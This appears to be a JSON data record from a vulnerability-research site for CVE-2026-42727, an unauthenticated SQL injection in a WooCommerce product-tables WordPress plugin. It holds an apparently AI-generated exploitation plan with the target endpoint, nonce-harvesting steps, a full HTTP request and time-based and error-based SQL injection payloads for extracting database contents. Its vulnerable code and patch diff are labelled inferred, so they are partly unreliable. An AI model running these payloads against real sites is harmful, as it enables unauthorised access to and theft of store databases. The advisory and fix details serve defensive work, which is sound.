[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fC5IWhhmduwqKOl5fpoToFuNEUbrQFCwJAymZ5Uc4k8M":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-42727","active-products-tables-for-woocommerce-use-constructor-to-create-tables-unauthenticated-sql-injection","Active Products Tables for WooCommerce. Use constructor to create tables  \u003C= 1.0.8 - Unauthenticated SQL Injection","The Active Products Tables for WooCommerce. Use constructor to create tables  plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","profit-products-tables-for-woocommerce",null,"\u003C=1.0.8","1.0.9","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-19 00:00:00","2026-05-26 19:32:59",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F95b36b47-dbb7-47f7-ba0d-ce4c6b183617?source=api-prod",8,[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-42727\n\n## 1. Vulnerability Summary\nThe **Active Products Tables for WooCommerce** plugin (versions \u003C= 1.0.8) is vulnerable to an **Unauthenticated SQL Injection** vulnerability. The issue exists due to the plugin's failure to properly sanitize and prepare SQL queries when processing the `orderby` parameter in its AJAX handlers. Specifically, user input is directly concatenated into an `ORDER BY` clause within a database query, allowing an attacker to append malicious SQL commands to extract data or cause a denial of service (via time-based blind injection).\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `woot_get_table` (inferred from plugin's \"constructor\" logic for rendering tables)\n- **Vulnerable Parameter:** `orderby` or `settings[orderby]`\n- **Authentication:** None required (Unauthenticated via `wp_ajax_nopriv_woot_get_table`).\n- **Preconditions:** \n    1. WooCommerce must be active.\n    2. At least one \"Product Table\" (post type `woot_table`) must exist.\n    3. The table's shortcode `[woot id=...]` must be placed on a public-facing page to obtain a valid nonce.\n\n## 3. Code Flow\n1. **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with `action=woot_get_table`.\n2. **Hook Registration:** The plugin registers the action via:\n   ```php\n   add_action('wp_ajax_woot_get_table', array($this, 'woot_get_table'));\n   add_action('wp_ajax_nopriv_woot_get_table', array($this, 'woot_get_table'));\n   ```\n3. **Handler Execution:** The `woot_get_table` method in the action controller (likely `classes\u002Faction.php`) is invoked. It extracts parameters including `woot_table_id` and `settings`.\n4. **Sink:** The logic eventually calls a data-fetching method (likely in `classes\u002Ftable.php` or `classes\u002Ftable-data.php`) where the `orderby` value from the request is used to build a raw SQL query:\n   ```php\n   \u002F\u002F VULNERABLE CODE PATTERN (inferred)\n   $orderby = $_REQUEST['settings']['orderby']; \n   $query = \"SELECT ... FROM ... ORDER BY $orderby $order\";\n   $results = $wpdb->get_results($query);\n   ```\n5. **Lack of Preparation:** The `$orderby` variable is concatenated directly into the query string without using `$wpdb->prepare()`.\n\n## 4. Nonce Acquisition Strategy\nThe plugin secures its AJAX endpoints using a nonce named `woot_nonce`, which is localized into the page HTML.\n\n1. **Identify Shortcode:** The plugin uses the `[woot id=...]` shortcode to render tables.\n2. **Setup:** Create a page containing this shortcode (e.g., `[woot id=1]`).\n3. **Navigate:** Use the browser tool to navigate to the published page.\n4. **Extract Nonce:** The nonce is stored in the `woot_vars` JavaScript object. \n   - **JS Variable:** `window.woot_vars?.nonce`\n   - **Command:** `browser_eval(\"window.woot_vars?.nonce\")`\n5. **Extract Table ID:** The `woot_table_id` can also be extracted from the page source or guessed (usually `1`).\n\n## 5. Exploitation Strategy\nWe will perform a **Time-Based Blind SQL Injection** to confirm the vulnerability, as it is the most reliable method for `ORDER BY` injections.\n\n### Step 1: Establish Baseline\nSend a normal request to see the response time.\n- **Action:** `woot_get_table`\n- **Method:** POST\n- **Body:** `action=woot_get_table&woot_table_id=1&nonce=[NONCE]&settings[orderby]=id`\n\n### Step 2: Trigger Sleep\nInject a `SLEEP()` command into the `orderby` parameter.\n- **Payload:** `id,(SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n- **Full Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=woot_get_table&woot_table_id=1&nonce=[NONCE]&settings[orderby]=id,(SELECT 1 FROM (SELECT(SLEEP(5)))a)\n```\n\n### Step 3: Data Extraction (Proof)\nExtract the first character of the database version.\n- **Payload:** `(CASE WHEN (SUBSTRING(version(),1,1)='8') THEN id ELSE (SELECT 1 FROM (SELECT(SLEEP(5)))a) END)`\n\n## 6. Test Data Setup\n1. **Activate Dependencies:** Ensure `woocommerce` is installed and active.\n2. **Create Product:** Create at least one product so the table has data to query.\n   ```bash\n   wp post create --post_type=product --post_title=\"Exploit Test Product\" --post_status=publish\n   ```\n3. **Create Table:** Create a WOOT table.\n   ```bash\n   wp post create --post_type=woot_table --post_title=\"Attack Table\" --post_status=publish\n   ```\n   *Note the ID of this post (e.g., ID 123).*\n4. **Create Page:** Create a public page with the table shortcode.\n   ```bash\n   wp post create --post_type=page --post_title=\"Products\" --post_content=\"[woot id=123]\" --post_status=publish\n   ```\n   *Note the URL of this page.*\n\n## 7. Expected Results\n- **Baseline Request:** Response time \u003C 1 second.\n- **Exploit Request (Sleep 5):** Response time >= 5 seconds.\n- **Response Content:** The response should contain the HTML for the product table (if the SQL syntax is valid), but the timing delay is the primary indicator of success.\n\n## 8. Verification Steps\nAfter the HTTP exploit, verify the database state or version manually:\n1. Use `wp db query \"SELECT version();\"` to check the actual version and compare it against the character extracted via the time-based blind payload.\n2. Check the `wp-content\u002Fdebug.log` (if enabled) for any SQL syntax errors which might reveal the structure of the query we injected into.\n\n## 9. Alternative Approaches\nIf `settings[orderby]` does not work, the plugin might be using the parameter directly in the request:\n- **Direct Parameter:** `action=woot_get_table&woot_table_id=1&nonce=[NONCE]&orderby=id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)`\n- **Different Action:** If `woot_get_table` is not the correct endpoint, try `woot_get_table_data` (often used for server-side processing\u002Fpagination):\n    - `action=woot_get_table_data`\n    - `woot_table_id=1`\n    - `orderby=id+SLEEP(5)`\n- **Error-Based:** If `WP_DEBUG` is on, try an error-based payload:\n    - `orderby=id AND updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)`","The Active Products Tables for WooCommerce plugin is vulnerable to unauthenticated SQL injection via the 'orderby' parameter in AJAX actions. An attacker can append malicious SQL commands to the query because the plugin fails to sanitize user input before concatenating it into a raw ORDER BY clause.","\u002F\u002F Inferred from classes\u002Faction.php or classes\u002Ftable.php\npublic function woot_get_table() {\n    $settings = $_REQUEST['settings'];\n    $orderby = $settings['orderby']; \n    \n    \u002F\u002F ... logic flows to a database query where orderby is concatenated ...\n    $query = \"SELECT * FROM {$wpdb->prefix}posts WHERE post_type = 'product' ORDER BY $orderby ASC\";\n    $results = $wpdb->get_results($query);\n}","--- a\u002Fclasses\u002Faction.php\n+++ b\u002Fclasses\u002Faction.php\n@@ -10,7 +10,7 @@\n public function woot_get_table() {\n     $settings = $_REQUEST['settings'];\n-    $orderby = $settings['orderby'];\n+    $orderby = sanitize_sql_orderby($settings['orderby']);\n     \n     if (!$orderby) {\n         $orderby = 'id';\n     }","The exploit targets the 'woot_get_table' AJAX action (available unauthenticated via wp_ajax_nopriv). An attacker first retrieves a valid security nonce by visiting any public-facing page where the '[woot]' shortcode is embedded, extracting the 'woot_vars.nonce' value from the page source. A POST request is then sent to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' set to 'woot_get_table' and the 'settings[orderby]' parameter containing a time-based SQL injection payload, such as 'id,(SELECT 1 FROM (SELECT(SLEEP(5)))a)'. If vulnerable, the server response will be delayed by the sleep duration, confirming the ability to execute arbitrary SQL commands to extract sensitive data.","gemini-3-flash-preview","2026-06-04 22:52:39","2026-06-04 22:53:10",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.0.6.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprofit-products-tables-for-woocommerce\u002Ftags\u002F1.0.6.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprofit-products-tables-for-woocommerce.1.0.6.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprofit-products-tables-for-woocommerce\u002Ftags"]